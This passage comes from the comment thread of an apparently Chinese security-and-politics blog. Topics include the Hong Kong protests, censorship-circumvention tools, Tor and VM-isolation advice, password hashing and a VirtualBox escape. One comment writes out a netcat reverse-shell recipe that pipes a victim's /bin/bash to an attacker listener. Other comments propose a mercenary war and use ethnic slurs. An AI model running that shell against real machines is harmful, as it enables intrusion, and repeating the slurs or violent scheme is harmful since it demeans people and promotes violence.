      非要把某个本来就难以量化的东西进行量化,反而走入歧途。


      [b]关于“强者与智者”[/b]
      “强者”还可以有其它的定义(比如“内心强大的人”)。
      同样的,“智者”也可以有不同的定义。
      不同的定义下,“强者”与“智者”重叠程度也不同。


      [b]关于“定义的一致性”[/b]
      “强者与智者”这两个概念,【不】需要达成一致。
      不同的人,有不同的价值观,对这两者的理解也可以有不同。
      社会本来就应该是【多元化】滴!

      删除
    15. (接上一单元)
      [b]关于“《黑天鹅》与《反脆弱》”[/b]
      感觉你就没去看过这两本。
      恐怕连俺整理的那个读书笔记,你也没细看吧?
      所以你才会说出如下这段——
      [quote]
      极端斯坦和平均斯坦,其实就是高低风险的问题。
      黑天鹅那本书的作者让人去做低风险的工作,远离极端斯坦,有种规劝人平庸的感觉。
      [/quote]

      删除
    16. (接上一单元)
      关于“文明等级的卡尔达肖夫指数”
      这个玩意儿很有名。
      但俺【不】赞同。

      不同层次的文明,差距会非常大,以至于——
      低层次的文明根本无法理解(无法思考)高层次文明使用的概念。
      卡尔达肖夫没有意识到这点。

      对更高层次文明而言,“能量”可能是某个不值一提的东西。
      而更高层次文明关注的东西,是我们目前无法思考的(因为我们的语言根本就无法表达相关的概念)

      好比说:
      史前狩猎时代的人类,很看重“猎物”,
      在他们的思维里面,能拥有很多猎物,就很牛逼了。
      在现代人看来,狩猎部落所看重的猎物,根本就不值一提。
      而现代人所追求的很多东西,根本无法向史前人类解释
      (即使你掌握了他们的语言,也无法向他们解释,因为史前的语言无法表达相关概念)

      同样的道理——
      卡尔达肖夫以为拥有很多能量,就很牛逼了。
      其实很幼稚。

      顺便说一下:
      更高层次文明与我们的差距,多半会远远大于我们与史前人类的差距。

      删除
    17. TO 17单元。
      博主有没有看全我1单元的4个理由。内心强大的人绝不能算强者,客观比主观重要。或者你把人当成文明来看待。你自己想想一个强大的文明该有什么特点?我上面提到了为什么评价文明等级的卡尔达肖夫指数是用文明能够利用的能源量级,而不是影响力?

      其实有争议的强者定义只是强者最低门槛是什么。
      最强的强者是没争议:上帝。无所不能,富有无限资源的存在。

      对比上帝,人类中的强者也该是拥有巨大资源和力量的人

      删除
    18. 博主没回答2,3,4,6单元的内容

      删除
  27. TO 博主

    近期没上评论区,恰逢博主再次发了一篇技术博文,又学习到了新的东西 :)

    上一篇博文博主提到的反送中运动“长期化”的手段和对真理部忽悠的反驳,俺都比较赞成。
    但是俺又有几个有关的提问:

    1.从721元朗事件到近期北角,炮台山等地福建帮派跟示威者的冲突,看样子朝廷祭出“群众斗群众”这招试图化解香港目前的示威势头。朝廷已经束手无策了吗?721袭击反而促使更多示威者上街。香港民众应该如何应对这招?
    博主上篇提到的[quote]如果抗议民众【突然】发起一个抗议活动,或者【突然】改变抗议活动的【时间/地点/形式】[/quote],对付黑帮也貌似有用。

    2.博主提到的游行民众用游击战降低成本。但是香港警察已经越来越变态(比如831太子站就无差别攻击市民)。既然涉及到生命危险,示威者这方面的成本也不低。简而言之,如何降低这方面的风险?

    3.最近李嘉诚在香港报纸发广告劝示威者,港府各退一步反而被官媒狠批“纵容犯罪”。李的态度是否代表了香港商界的心声?商界到底是站在朝廷还是示威民众这边?

    回复删除
    回复
    1. TO 博主

      既然提到翻墙,俺来分享一些反馈 (华东某地区,联通):

      4. 自由门九月份都比较稳定,偶尔断线,但是下行速度也不算快(不到100KB/s)。
      5. TOR+meek基本上废掉了,能侥幸连上也是蜗牛速度。
      6. I2p 基本上每天运行一次,活动节点很多(一小时内超过一百),但是也是最慢的(平均20KB/s)。
      7. 赛风只有日本通道能连上,幸运的话能连上几个小时,不然每隔几分钟就断线。
      8. VPN Gate 十次尝试大概两三次能成功,但是连接成功的服务器也是最快滴(高清YouTube没问题)。

      还有就是无界到底出了什么问题?最新的19.02版本被俺的杀毒软件报毒(自由门反倒没问题)。官网也有证书问题。

      删除
    2. TO 挪威森林猫
      按理说,GFW 的封锁力度应该是:内斗大会 > 六四 > 沦陷日。
      这两年我一般是通过使用能看 Netflix 的机场梯子,一直坚挺。不过最近由于隐私考虑,我不再购买机场服务,因为我目前没有发现支持 BTC 等加密货币支付的机场,我只能重新在网上找免费梯子凑合着用。但这些免费梯子速度慢不说,在特殊时期往往也用不了(GFW 封锁了绝大多数热门 VPS 的 IP 段)。
      至于轮子的翻墙软件,我是不会考虑的,原因是不开源,可能有后门,抗封锁能力差,支持的平台太少(往往只有 Windows),但博主偏偏喜欢这类翻墙软件。
      [url=https://program-think.blogspot.com/2019/08/weekly-share-136.html?comment=1566885094895]之前的讨论[/url]

      删除
    3. 个人很好奇墙是怎么从海量的HTTPS CDN连接里辨别出meek连接的??

      删除
    4. TO V2EX 2单元

      请教一下你所说的“能看 Netflix 的机场梯子”是那些机场?能给些链接吗?

      删除
    5. 香港有不少人有外国国籍或者至少有居留权,我猜这个群体内有一部分人没有动力支持示威。
      另外,房子是不能移动、无法撤离的资产,如果要撤离只能指望别人接盘,但是香港经济搞坏后也没人接盘了,尤其是人口密度高,不能靠农业维持经济运转的地方,所以这个群体中也肯定有人不太支持示威。
      可能还有一种人,觉得再赚几年就够移民了,这种人当然也有可能不太支持示威,并且对抗争不抱希望的。

      所以新闻说示威的主要都是香港底层的年轻人(没有存款,所以无法挤兑银行)和学生,这是有道理的。

      如果到11月还不见希望,我希望英国或者美国给香港人免费发放签证,让所有香港人移民过去,重新开始人生,留一个空岛,人走之前可以把房子炸掉留给中共。

      删除
    6. 根据我从台湾朋友处询问得知的信息,台湾似乎不太可能大量接收香港难民。理由可能有几点:
      1.怕中国匪谍
      2.香港人对台湾没有国家认同,不论是中华民国或者台湾国都不一定认同。有些香港人用“一国两制”恐吓台湾人,反而给一些台湾人留下不好的印象(这个原理有好像一些大陆人无耻开口让台湾人反攻大陆)。绿营也只是用“一国两制”来拉抬选情,不会真正大量支持香港难民。
      3.香港人以前曾自认为高人一等,歧视过台湾人,有些台湾人是记仇的(想想博主提过的记仇者例子,我主张放下仇恨)。台湾人去香港坐公交、购物时都存在对台湾人的严重歧视。一些台湾人认为香港人金钱意识太强,不会忍受台湾的低工资,为对于香港人而言,英国可能是最佳施救者,美国也不错。更重要的是一些台湾人认为香港人把钱看得比人情重。

      其他还有很多不同的人,理由也不相同,比方说部分反共的台湾人把难民视为懦弱的体现,这部分台湾人认为,香港人除非真正流过血和共匪打仗,而不仅是反修例,才值得接收。其中最能冠冕堂皇的大声讲出来的理由就是能力不足,其实这倒未必是主要原因。顺便一提,根据国际特赦组织的资料,其实发展中国家接收的难民比欧美发达国家多得去了。在我看来,西方人就是要卡你,不让你移民,让你即便移民了也只能老实打黑工交了社保,而又不让你享受社保的福利,但是欧美国家就是故意要做出一副关心人权的姿态,为政治宣传。

      绿营用《难民法》拉选票,但实际故意不让《难民法》通过,反而还是国民党立委让《难民法》排进一读的。台湾现有的港澳条例就允许香港移民,而且门槛也不算高,如果需要降低门槛的话,就是针对香港底层的人士了。

      支持香港的也不是完全没有,比方说台湾蓝营名嘴赵少康还是比较同情香港人的,他主张应该开放个一百万香港人移民。

      删除
    7. 总之这就是一件暴露人性丑恶的事情。不说西方国家,就说香港人自己也有不团结的问题,分明共产党这个大敌当前,有钱的香港人为什么不去挤兑银行?让一群没钱的香港年轻人去挤兑,结果才多少钱,那能叫挤兑吗?

      删除
    8. TO 4 单元的网友
      自行 Google,能找到不少。
      另外 V2Ray 官网似乎推荐过几个机场,我用过一段时间,还不错,就是稍微贵了点。(隐私起见,我不能在这里发 aff)
      你也可以去 [url=https://affyun.com]Affyun[/url]找个标题带有 Netflix 的 VPS 来自建。(经过测试,有的比较冷门的机房,即使标题没写,也可以看 Netflix)

      删除
  28. 博主,nc和nmap有什么区别吗? nmap不是更好用?

    回复删除
    回复
    1. 这两个是同一个开发者的作品,参考我在 7 楼 37 单元的讨论。

      删除
  29. 没有 -e 选项的可以用管道来实现远程执行。

    以 Linux 为例子:

    被攻击的机器执行:

    mkfifo pipe

    nc -nv RemoteAttackMachineAddress Port < pipe | /bin/bash 1>pipe

    攻击机器执行:

    nc -lkvp Port

    然后就可以执行 shell 命令操作被攻击的机器。

    回复删除
  30. 发现google不厚道了。登录很久没用过的gmail,强制手机验证!!即使回答了设置的提示问题也不行。手机验证绕不过去。可是很早那时申请的邮箱根本没设置手机号。深感谷歌不是以前的谷歌了

    回复删除
    回复
    1. 你才知道 Google 早就变了?你忘了当年的【棱镜门】和【蜻蜓计划】?正因为如此,我注销了这些强制要求绑定手机号的账号。

      删除
  31. 请问博主,你就觉得中共能称到22世纪吗?我是大陆有希望在22世纪前脱离其魔爪吗?我们该做些能帮助大陆尽量能在22世纪前摆脱共产党的统治?

    回复删除
  32. 如果往最坏的方面想,那就是雇佣兵,你觉得是否可行呢,佣兵的战斗力是非常强的,十万佣兵足以结果共产党。当然这是打算在21世纪末采取的行动,最后的计划,鄙人目前在香港,目前的计划是这样的:

    1.雇佣兵介入挑起战争,无关输赢,旨在挑起战争,解决欧美国家(尤其是美国)“师出无门”,此举就像一颗手榴弹去炸一火药,干柴烈火一点即爆。

    2.届时,各方面都会支持反共,立场鲜明举起反共大旗,香港、台湾、美国、各新闻报社、人权观察组织、海内外、网络、推特...等等,到时群情激愤,必结果了中共不可,此举做一个引子,旨在动员所有人,核心目的是引起连锁反应。

    3.就算不能成功,中共也肯定会被吓的魂飞魄散,全世界都是倒共之声,中共也名存实亡,过街老鼠人人喊打,在内忧外患之下,此时再进行非暴力革命就如同补刀,一击即倒。

    4.研究中共数十载,已经找到了其几处软肋,只需袭击这几处弱点,中共必会手忙脚乱,惊慌失措,上忙下乱,应接不暇。

    5.我知道随想不喜欢、不希望这样做,但我觉得以你博客的力量未必能在22世纪前终结共产党,希望渺茫到几乎可以不计,你觉得呢?当然,如果能那样做最好,以非暴力革命的方式结束中共,但概率很小,我衷心的希望能如此。

    回复删除
    回复
    1. 阁下去找美国黑水公司谈了吗?期待您发动暴力革命推翻中共政权。

      删除
  33. 如果中共能够撑过22世纪,那我们就真的没什么指望了;我们总说等机会,非暴力革命,战略上悲观,战术上乐观,我们总是一直在拖。

    回复删除
    回复
    1. 阁下复制粘贴漏了一段话,我来帮你补上。

      [quote]
      国内的形式越来越严峻,共匪统治的时间越长,民主的难度就越大,倘若几百年后,即使推翻了中共,民众也是变的和脑残一样了,根深蒂固各种余毒恐怕使民主进程根本无法展开。凡是被共产党折腾过的国家没几十年元气很难恢复,有时候需要上百年其阴霾才能消散殆尽,就如同核污染核辐射一样。

      等待机会可以,但要有个期限,给自己个期限,也给别人承诺,这个期限可以很长,但不能一直无止境就这么将就下去,这样的日子真不知道什么时候才是个头。人生有限,短短几十载,真正壮年失去也就二三十年,过了这个阶段,你再想做什么也有心无力了,我们毕竟是肉体之躯,我们都会老去,一定要把握住时间,在有限的时间内让个体产生无限的价值。

      我觉得应该给读者、大家一个期限,不能这么盲目下去。
      [/quote]

      删除
  34. 而且时间越长,、你被爆破的风险越大,那一天你被抓了,大家就彻底失去希望了,我们也没有什么可以联络的地方了,大家就如同一盘散沙被大风一刮消失在苍茫的大沙漠中

    回复删除
  35. 这个中国,中共的统治下上的恶人从来不会得到报应,而好人永远没有什么好下场。

    很多善良的人百般受挫后开始变坏,这个制度是就是好人变坏,逼良为娼。在中国大陆,善良是最没用的东西。

    回复删除
    回复
    1. 窩以前就針對支那豬圈劣幣驅逐良幣、懲善揚惡這個現象做過分析,乃是支那賤畜國粹“帝王術”所致,光是終結支共還不夠,劣等支那文化也要徹底清算,否則再次上臺的政權遲早又要走向支那豬圈一貫獨裁老路

      删除
  36. http://i.ntdtv.com/assets/uploads/2019/09/115df4fb6a2badf3c449a9e47d41cb44-600x525.jpg

    回复删除
  37. https://docs.kali.org/general-use/kali-linux-forensics-mode 一般的Live可能自动挂载分区,推荐 Forensic 模式。这个模式可以亲自实现,在内核参数中添加 boot=live noswap noautomount ;有人厌恶 Debian 及其衍生品的,可以在其它发行版中亲自实现 Forensic 模式 https://wiki.archlinux.org/index.php/Remastering_the_Install_ISO

    回复删除
  38. 叔~我来啦~~
    终于出来呼吸到自由的空气了~~~~~~~~~
    一个多月前看了那个活摘的纪录片,我这个心情简直是久久久久久久不能平复,被吓到了....
    真的不敢相信,这是发生在21世纪的事情。
    然后我就一直潜水了,因为怕被抓,发言有风险,我好怂啊{捂脸}您真是太勇敢了。
    长命百岁。

    回复删除
  39. 蓝灯9月19号还可以用,20号就挂了,另外请问编程随想君,谷歌商店里面近期的[老王VPN]是中共的钓鱼VPN吗?

    回复删除
  40. TO V2EX(7楼5单元)
    (为了改善信噪比,【编程语言】的话题俺另开一楼。还望谅解)

    编程语言的口水战,有几十年历史了。
    “编程语言的对比”,其实要分为两个【完全不同】的问题:
    1、抛开个人因素,谈语言的对比
    2、结合个人因素,谈语言的对比(也就是谈“最适合自己的”)

    第2个问题不但涉及个人情况,还涉及到个人喜好,讨论通常【不会有】结果。
    下面俺只谈第1个问题。

    回复删除
    回复
    1. (接上一单元)
      有些人为了避开口水战,采用一种【调和的观点】——认为编程语言没有优劣之分,都是平等滴。
      对这类观点,俺【不】赞同。

      为啥存在“优劣之分”?
      《黑客与画家》这本书中聊得很多了。
      建议没看过的程序员读者,有空去看看此书。

      俺基本赞同保罗·格雷汉姆的一些说法。
      对其中一个说法,俺大致【转述】如下。

      [quote]
      他提到了:各种编程语言的优劣,会形成一个类似【协议栈】的层次。
      假设某个程序员只熟悉【一个】编程语言,
      当此人往下看(看那些更低层次的语言),会觉得下面这些语言都很傻逼。
      但如果此人往上看,【不会】觉得上面层次的语言很牛逼,而是觉得上面层次的语言【很奇怪】。
      (因为无法理解其精妙,于是就会觉得奇怪)
      [/quote]

      俺举个例子:
      如果某个 C++ 程序员【没有】真正理解“模板的编译时展开”,
      也就【不会】明白——C++ 模板的编译时展开,是【图灵完备】滴,可以用来进行【元编程】。
      当此人看到 C++ 元编程的代码,就会觉得很奇怪。

      删除
    2. (接上一单元)
      在评论区中,俺多次引述了编程牛人【Alan Perlis】的一句话:
      不能影响你编程观点的语言,不值得你去学!
      (注:此人是第一个图灵奖得主)

      这句话反过来理解就是——
      程序员应该优先去学习那些:能够显著改变你【观念&视野】的编程语言。

      删除
    3. 这个v2ex很像之前的空脑子,提一堆没多大意义的重复的技术问题。
      话说博主的常见问题解答FAQ不搞吗?有志愿者愿意替博主把回答过的问题和回答收集发表在github吗?老是重复的问题

      删除
  41. TO V2EX(7楼)
    (为了改善信噪比,你在7楼关于【安全加固】的问题,俺另开一楼回复。还望谅解)

    [b]关于“开源项目的代码安全性”[/b]
    这个问题要分几个维度讨论
    1、软件的类型和层次
    越贴近基础设施的,安全漏洞的危险性越大。
    2、开源项目的模式
    “大教堂模式”与“集市模式”,在这方面也会有差异。
    3、关注程度
    关注程度越高,投入“代码审计”的资源(包括人力)也会更多


    [b]关于“【离线的】主机”[/b]
    这招属于【物理隔离】的招数之一。
    对这类主机的升级/更新,俺建议:自己搭建升级镜像。
    这个建议在《[url=https://program-think.blogspot.com/2019/04/Security-News.html]近期安全动态和点评(2019年1季度)[/url]》聊过
    大致的玩法如下:
    【隔离 PC】总是断网;当需要升级时,【只连接】升级镜像服务器
    (注:此时,升级镜像服务器也只于“隔离 PC”相连)

    更进一步的做法是——
    用移动存储介质,在“升级镜像”与“隔离主机”之间同步升级包。
    如果能做到这点,攻击者【无法】在“隔离 PC”上建立(用于后门的)信道


    [b]关于“防火墙的教程”[/b]
    确实可以考虑写这方面。
    如果要写,会先写 iptables 的使用。

    回复删除
    回复
    1. (接上一单元)
      [b]关于“构造复杂密码”[/b]
      俺在《[url=https://program-think.blogspot.com/2010/06/howto-prevent-hacker-attack-0.html]如何防止黑客入侵[/url]》系列其中一篇,聊过 N 个招数。
      最后一招是【利用散列值】。
      UUID 的做法,类似于这招。

      【彩虹表】是用来加快猜解的效率。
      用“彩虹表”的前提是——“密码空间”在一个可接受的范围内。

      当你使用散列值作为密码,分几种情况:
      1、
      如果攻击者并【不】知道你使用的散列算法(算法有很多种,而且可以做一些定制/微调)
      难以根据【原始文本】构造彩虹表
      2、
      如果攻击者明确知道你使用的散列算法。
      此时的关键在于——计算散列值的原始文本的【复杂度】
      如果复杂度足够,依然【无法】构造彩虹表
      3、
      如果攻击者不考虑散列算法,直接针对【散列值空间】构造“彩虹表”。
      (大部分散列算法的输出,也就少数几种:128bit、192bit、256bit、512bit)
      但即使拿比较短的 MD5 算法(128bit),其散列空间也足够大,(构造“彩虹表”)从【成本】上讲也【不可能】


      [b]关于“找回密码”[/b]
      现有的几个方案,都有各自的一些缺点:

      回答问题
      会遗忘(根源还在于:记忆力)

      公私钥方案
      对技术菜鸟操作难度大。
      另外,如何保存?
      物理存储(比如纸张)有损坏风险;电子存储有入侵风险;隔离的电子存储成本偏高。

      助记词(BIP32 之类)
      很难平衡“复杂性 VS 记忆力”。
      如果要保存,存在上一条的弊端

      用另一个邮箱
      存在【自举】的悖论

      硬件 key
      可能会损坏

      ......

      删除
    2. (接上一单元)
      [b]关于“VBox 的漏洞”[/b]
      首先,感谢你的分享 :)

      这个漏洞是去年4季度曝光。而俺从今年1季度才开始发《近期安全动态和点评》。
      另,
      “虚拟机穿透”这个话题太【小众】了。
      估计俺的读者中,真正做到【日常操作虚拟化】的人应该很少。

      俺在《[url=https://program-think.blogspot.com/2010/06/howto-prevent-hacker-attack-0.html]如何防止黑客入侵[/url]》其中一篇,稍微提到过“虚拟机穿透”。
      当时俺的说法是:这种攻击的难度非常高(一般的入侵者难以完成)。
      今天正好借这个案例点评一下:

      ========

      VBox 的 e1000 穿透漏洞
      如果攻击者要利用该漏洞,需要【同时满足】如下 N 个条件
      1、虚拟机软件类型——VBox
      2、虚拟机软件版本——5.2.20 之前
      3、网卡模式——NAT
      4、驱动类型——Intel PRO/1000 MT Desktop (82540EM)
      5、攻击者要获得在 Guest OS【执行代码】的机会
      6、攻击者要获得 Guest OS 的权限(在满足第5条的情况下,要能找到可利用的“提权漏洞”)

      ========

      结论:
      1、
      除非攻击者对目标的情况非常非常熟悉,否则的话,【难以】发起这种攻击。
      比如说:为了完成第5、6点,需要很了解目标的 Guest OS。
      2、
      既要保持自己的攻击面【足够小】,还要让它【足够模糊】。
      所以俺总是【不愿意】透露自己的系统配置。
      3、
      如果读者采用了俺长期强调的【虚拟机隔离】。正好能规避此攻击。
      因为日常操作在【host only】模式的“隔离 VM”中完成,攻击者在这个 VM 中无法穿透。
      而【NAT 模式】的“网关 VM”只是作为“中转”,【不会】有日常操作。因此,攻击者【难以】在该 VM 获得【代码执行】的机会。

      删除
    3. (接上一单元)
      [b]关于“Tor 节点的定制”[/b]
      前几天也有读者提到过,当时俺的回复如下:
      https://program-think.blogspot.com/2019/09/share-books.html?comment=1567764588943

      那天回复比较快,没来得及细说。
      今天再重新说得更全面更严谨一些。
      以下建议针对“安全性”【非常高】的用户

      ========

      1、
      光考虑“国别”是【不够】滴!
      应该考虑【势力范围】。
      比如说:“英、加、日”等国,基本上属于美国的附庸。属于同一个“势力范围”。
      所以,下面的讨论以“势力范围”代替“国别”

      2、
      “前置代理服务器”所在的“势力范围”要【不同于】“Tor 节点”所在的“势力范围”

      3、
      Tor 的“入口节点”与“出口节点”最好也处于【不同的】势力范围。

      4、
      如果用户的【肉身】处于某个“势力范围”的司法管辖权之下。
      那么,“前置代理服务器”以及“3个 Tor 节点”,都【不应该】位于肉身所处的“势力范围”。

      5、
      上述几条如果【全都】满足,可以极大增加“逆向追溯”的难度。

      删除
    4. (接上一单元)
      [b]关于“HAProxy 转发”[/b]
      首先,感谢分析这个招数 :)

      虽然开放的端口降低到【一个】,但依然会被探测。
      以本文中对 SSH 的探测为例。
      在你的这个方案中,nc 依然能探测到 SSH server 的信息。

      同样的道理:
      如果内部的 server 有安全漏洞,也依然会被攻击。

      删除
    5. TO 编程随想
      一开始想到了 10 个问题,后来看其他读者的讨论就加了一些,给博主带来压力,我也很无奈 :(
      ==========
      加密货币钱包就是以【私钥】作为凭据,为了方便记忆,映射为【助记词】。
      ZeroNet 也是以私钥作为用户身份的凭据。
      另,“助记词”相关规范是 BIP39,不是 BIP32。

      删除